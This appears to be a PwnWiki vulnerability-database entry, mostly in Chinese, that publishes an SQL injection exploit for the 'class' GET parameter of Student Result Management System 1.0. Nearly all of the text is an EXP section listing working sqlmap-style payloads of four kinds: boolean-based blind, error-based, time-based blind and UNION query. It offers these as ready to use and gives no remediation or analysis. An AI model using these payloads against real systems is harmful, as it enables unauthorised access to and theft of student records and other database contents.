◆◆0

Student Result Management System 1.0 – ‘class’ SQL注入漏洞

免费、自由、人人可编辑的漏洞库

,

漏洞影响

1.0

EXP

    Parameter: class (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: class=-6346' OR 3657=3657#&rn=1

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1

    Type: UNION query
    Title: MySQL UNION query (random number) - 7 columns
    Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1

免费、自由、人人可编辑的漏洞库--PwnWiki.com

返回顶部